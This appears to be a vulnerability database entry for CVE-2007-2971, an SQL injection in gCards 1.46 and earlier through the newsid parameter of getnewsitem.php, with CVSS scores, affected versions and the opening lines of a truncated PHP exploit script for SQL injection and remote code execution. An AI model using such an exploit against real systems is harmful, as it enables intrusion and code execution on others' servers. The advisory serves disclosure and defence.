7.5
CVSSv2

CVE-2007-2971

Published: 01/06/2007 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in getnewsitem.php in gCards 1.46 and previous versions allows remote malicious users to execute arbitrary SQL commands via the newsid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

greg neustaetter gcards 1.13

greg neustaetter gcards 1.43

greg neustaetter gcards 1.44

greg neustaetter gcards 1.45

greg neustaetter gcards

Exploits

#!/usr/bin/php -q -d short_open_tag=on <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); if ($argc<4) { print "-------------------------------------------------------------------------\r\n"; print " gCards <= 146 SQL Injection/Remote Code Execution Exploit\r\n"; print "--------------- ...